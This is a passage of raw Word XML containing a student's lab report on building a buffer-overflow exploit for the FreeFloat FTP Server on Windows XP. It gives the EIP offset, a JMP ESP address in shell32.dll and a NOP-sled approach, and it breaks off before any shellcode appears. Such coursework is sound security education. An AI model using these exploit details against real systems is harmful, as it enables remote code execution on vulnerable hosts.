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4E38B" w14:textId="20758AF3" w:rsidR="004C4661" w:rsidRDefault="003027A1" w:rsidP="004C4661">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CPSC 42700 Project 6: Exploiting the FreeFloat FTP Server on Windows XP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE7E7CB" w14:textId="13983D31" w:rsidR="004C4661" w:rsidRPr="004C4661" w:rsidRDefault="004C4661" w:rsidP="00DC5CF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C4661">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Causing a crash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7C826" w14:textId="6A17C78C" w:rsidR="00505B22" w:rsidRDefault="00505B22" w:rsidP="00195CF3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The first part of the project I did was making sure that I could</w:t>
      </w:r>
      <w:r w:rsidR="00195CF3" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> crash</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the program by feeding in a large amount of "A's".</w:t>
      </w:r>
      <w:r w:rsidR="00143E48">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidR="00511A1E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decided</w:t>
      </w:r>
      <w:r w:rsidR="00143E48">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tha</w:t>
      </w:r>
      <w:r w:rsidR="00511A1E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00143E48">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00511A1E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“A*768” would be plenty enough to crash it.</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00195CF3" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Once I ran the code it</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> did crash the program on the XP machine.</w:t>
      </w:r>
      <w:r w:rsidR="00195CF3" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meaning there </w:t>
      </w:r>
      <w:r w:rsidR="00FC6A8E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>were no</w:t>
      </w:r>
      <w:r w:rsidR="00195CF3" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> issues with the network, code or programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F33EE" w14:textId="09315A78" w:rsidR="004C4661" w:rsidRPr="004C4661" w:rsidRDefault="004C4661" w:rsidP="004C4661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C4661">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Determining the return address offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A311FF2" w14:textId="7524D0DA" w:rsidR="00505B22" w:rsidRPr="009D0843" w:rsidRDefault="00505B22" w:rsidP="009D0843">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The second part of the project was finding the correct offset for the EIP address.</w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The EIP is the return address</w:t>
      </w:r>
      <w:r w:rsidR="00387B3A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00387B3A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells the computer where to go to execute the next command</w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> When we filled the buffer with all "A's", we did</w:t>
      </w:r>
      <w:r w:rsidR="00A53B73">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in fact</w:t>
      </w:r>
      <w:r w:rsidR="00A53B73">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> overwrite the EIP with </w:t>
      </w:r>
      <w:r w:rsidR="000E5848" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>42 42 42 42</w:t>
      </w:r>
      <w:r w:rsidR="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. But this doesn’t help us because it doesn’t correctly differentiate it from the other strings of "A's". To fix this we created a specific generator that generates a pattern of unique characters. Using this genPattern function </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filled the buffer again, making sure to overwrite the EIP value. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034365A" w14:textId="13C2196A" w:rsidR="0084261A" w:rsidRDefault="00291BB7" w:rsidP="00291BB7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This time when I looked at the overflown buffer, I can see that the EIP has changed to a series of four hex codes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>At this point</w:t>
      </w:r>
      <w:r w:rsidR="00A53B73">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the reverse of the characters that </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> After swapping them around</w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I’</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">m left with four identifiable Ascii </w:t>
      </w:r>
      <w:r w:rsidR="000E5848" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hex’s</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000E5848" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>41 69 32 41</w:t>
      </w:r>
      <w:r w:rsidR="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Which translates into “</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ai2A</w:t>
      </w:r>
      <w:r w:rsidR="00A7008C" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”. Using</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the "find" command we can then see the exact number that those hex characters </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>occur in the generator</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n this case</w:t>
      </w:r>
      <w:r w:rsidR="003F5BA6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the offset</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was "</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>246</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">". </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also double check this number by adding 4 "B's". </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f the EIP becomes the hex codes for B, </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will know </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I have the right offset</w:t>
      </w:r>
      <w:r w:rsidR="00505B22" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855BF71" w14:textId="0515F62C" w:rsidR="004C4661" w:rsidRPr="004C4661" w:rsidRDefault="004C4661" w:rsidP="004C4661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C4661">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding a JMP ESP instruction </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFCD588" w14:textId="50AB3339" w:rsidR="00616543" w:rsidRPr="009D0843" w:rsidRDefault="00387B3A" w:rsidP="00DF49D7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now instead of filling the EIP with “B’s” we want to fill it with something </w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else. In this case</w:t>
      </w:r>
      <w:r w:rsidR="003F5BA6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> we want to fil it with the </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>instruction</w:t>
      </w:r>
      <w:r w:rsidR="007E59E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidR="007E59E8" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>instruction</w:t>
      </w:r>
      <w:r w:rsidR="007E59E8" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="007E59E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow us to</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> jump to the </w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode. </w:t>
      </w:r>
      <w:r w:rsidR="007E59E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B0CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell32.dll</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the </w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> value which was </w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidR="00A7008C" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x20\x10\xB4\x7C”</w:t>
      </w:r>
      <w:r w:rsidR="00DF49D7" w:rsidRPr="000E5848">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00610EEE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00610EEE" w:rsidRPr="00610EEE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This can be done just by using the CTRL + F and searching for the </w:t>
      </w:r>
      <w:r w:rsidR="00DD6968" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JMP ESP </w:t>
      </w:r>
      <w:r w:rsidR="00DD6968" w:rsidRPr="00610EEE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="00610EEE" w:rsidRPr="00610EEE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55905FC9" w14:textId="0C7E2C92" w:rsidR="0084261A" w:rsidRDefault="00DF49D7" w:rsidP="0084261A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>At this point</w:t>
      </w:r>
      <w:r w:rsidR="00A53B73">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> add</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Nopsled</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> character </w:t>
      </w:r>
      <w:r w:rsidR="0084261A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16 times, this allows you to basically slide right into the area of the stack that you want to be. In this </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r w:rsidR="003F5BA6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the code will “</w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">slide" down all </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the NOP’s </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and hit the shellcod</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
